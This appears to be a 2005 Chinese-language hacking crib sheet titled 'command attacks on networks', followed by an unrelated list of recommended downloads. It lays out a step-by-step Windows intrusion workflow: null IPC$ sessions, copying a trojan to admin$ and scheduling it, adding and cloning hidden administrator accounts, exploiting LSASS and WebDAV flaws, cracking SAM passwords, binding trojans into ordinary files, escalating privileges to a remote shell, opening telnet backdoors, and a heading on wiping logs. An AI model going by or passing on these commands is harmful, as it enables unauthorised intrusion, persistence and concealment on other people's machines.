网络中的命令攻击
作者:默阿
日期:2005年04月01日
来源:index.asp
建立空连接
net use //ip/ipc$ "密码" /user:""
删除连接
net use //ip/ipc$ /del
建立映射盘
net use u: //ip/d$
察看连接情况
net use
上传木马攻击(在建立了管道连接以后)
copy m.exe //ip/admin$(直接将文件传输到system32文件夹中)
net time //ip(查看对方电脑的时间)
远程命令电脑定时执行程序
at //ip 7:08 m.exe
telnet ip 99
建立新用户
net user guoyan /add
net localgroup administrators guoyan /add
net user(察看当前所有用户名)
net user 用户名(可以察看该用户的身份)
察看本机端口与其他电脑的连接
netstat -an
察看共享目录
net share
net shanre admin$ /del(删除共享)
攻击 LSASRV.DLL远程溢出工具(RPC)
扫描软件:DSScan.exe扫描可攻击电脑
用 ms04011.exe攻击可使对方电脑如冲击波般症状
msrg.exe 可以攻击信使服务
getos(获取对方电脑的版本)
nc.exe(缓存区溢出侦听)
比如,用nc监听1888端口 nc -l -p 1888
-----------------------------------------------------------------------------------------
第5天
webdavscan可以扫描有此漏洞电脑(默认端口为7788)
webdavx3可以完成攻击(webdavx3.exe ip)
使用这两条命令 nc -vv ip 7788(探测开放端口,类似telnet)
telnet ip 7788
系统权限提升
a/SAM密码破解法 (LC4)
LC4安装注册汉化
Lc4破解本地的用户账户(本地机使用)
LC4破解远程用户的账户密码
前门攻击(暴力破解)
流光Fluaxy(字典,高级设置中将扫描范围规定好再扫描)
使用流光把远程机的sam文件下载保存到本地机,配合LC4.exe可以暴力破解登录密码。
smbcrack 破解远程的密码 (自己制作字典,使用记事本,改后缀*.dic,将smbcrack和 字典两个文件 放入同一个目录中,破解比较快)
smbcrack ip 1.dic 80
redbutton来探测管理员账户,可以看管理员是否改名如: administrator 改成admin
b/木马陷阱法(bindfile&开山文件合并器,或者在根目录下设置自动运行autorun.inf)
bindfile把文件捆绑到一个正常的文件(需要被绑定的文件和木马程序放在同一目录下)
开山文件合并器可以改变文件的图表等,合并后的文件为exe文件
c/经典的提升权限工具(先以普通用户身份登录以后)
pipeupadmin(以普通用户身份登录如:guest,运行pipeupadmin.exe)
net start netdde启动网络动态数据交换服务DDE服务,运行ndde.exe "net user user1 /add
然后提升权限ndde.exe "net localgroup adminstrators user1 /add"
ERunAsX.exe最棒!smss.exe的debug子系统的漏洞,把相应的文件传到对方机器目录中,运行 erunasx.exe cmd.exe打开对方的壳
2、后门的运用(3种如灰鸽子)
terminal server(终端服务)
制作后门(制作批处理服务,远程开启终端服务复制到对方机中,如3389端口)
账户的克隆(ca.exe //192.168.2.47 administrator qwaszx g4 1,用户把管理员的账户克隆后,在管理中看不出来。cca.exe //192.168.2.47 administrator "123456")
账户的隐藏
开启对方的telnet服务(使用工具telnet
hack,OpenTelnet.exe是用来启动远程服务器的Telnet的,Resumetelnet.exe是用来把修改了的配置都返回到默认配置
上去,关闭Telnet服务等。运行OpenTelnet.exe //192.168.2.47 administrator qwaszx 1
99,联机成功后使用端口99登录 tenlet //192.168.2.47 99)
账户手工克隆(psu、regedit-hkey_local_machine-sam)
察看被攻击电脑的进程winlogo如PID为212
用psu打开相应的注册表选项(psu -p regedit -i 212,察看account如:administrator的键值0x1f4,根据键值查找id复制到普通用户的F二进制中),完成
3、日志的清除
分享到:
相关推荐
网络攻击中的命令形式 是高手们在网络环境中进行攻击非常棒的工具
网络攻击命令大全.doc网络攻击命令大全.doc
一些常用到的网络攻击有关的简单命令,拿来学习学习也不错
答:网络攻击实质上就是黑客利用被攻击方自身网络系统存在的安全漏洞,使用网络命令或者专用软件对网络实施的攻击。攻击可能导致网络瘫痪,也可能破坏信息的传播,还可能使系统失去控制权。网络攻击与一般的病毒、...
网络状态和配置情况、进行故障诊断是网络攻防对抗的基础,Windows 的基本网络命令是查看网络状态和配置情况、进行故障诊断的必要手段。另外,也是缓冲区溢出攻击后使用的主要手段
它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址...
防p2p 使用的ARP攻击造成的网络掉线,网速慢,等现象
网络初学者基本命令之DOS攻击.docx
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包...
Dos网络命令,最基本的,也是最基础的网络攻击原理,供新手参考一下.
9)、深入了解各类SQL注入漏洞的原理、攻击手段及加固措施 10)、掌握上传漏洞、命令执行漏洞、XSS漏洞等常见Web漏洞的利用方式及技巧 11)、掌握各类提权方法 12)、掌握各类第三方插件/程度的漏洞利用方法 考试及...
对网络命令总结的文本文档 1】ping 用来测试网络是否建立连接,获取ip地址,也可以用来攻击 ping -l 65500 -t 127.0.0.0『对某个地址连续发送大小为65500大小的数据包,一直到它死机,对98使用较好 2】netstat ...
四、Windows常用网络测试命令 第3次上机内容 五、配置个人防火墙 六、杀毒软件应用 第4次上机内容 七、网络扫描工具 八、网络监控软件 第5次上机内容 九、Windows系统的安全性 十、网络通信工具
随着信息技术的迅速发展,网络成为人们日常生活中密不可分的一部分,网络问题也就成为计算机系统维修工作中比较常见的故障。本文介绍了一些常用的DOS命令,将有助于快速判断网络故障原因,并有效地解决故障。
在网络攻击环境下,这却是可能发生的。当一个攻击者利用一个系统漏洞非法入侵进入到你的系 统。当你使用ps命令列出系统中的所有的进程时,却看不到什么异常的证据。你查看你的password文件,一切也是那么的正常。...
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
dos防攻击配置命令.doc EAPS配置命令.doc ERPS(G8032-201003)配置命令.doc GVRP配置命令.doc IGMP-snooping配置命令.doc interface range命令.doc IPv6配置命令.doc IP防攻击命令.doc LLDP配置命令.doc MACFF配置...
除了linux系统层面的命令外还有网络技术层面的命令,还介绍了基本的网络概念,和常见的网络层面操作命令,如域名,dns服务器设置等,还详细介绍了主机安全命令,被攻击后的常见响应命令,重要数据备份,和系统层面的...
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...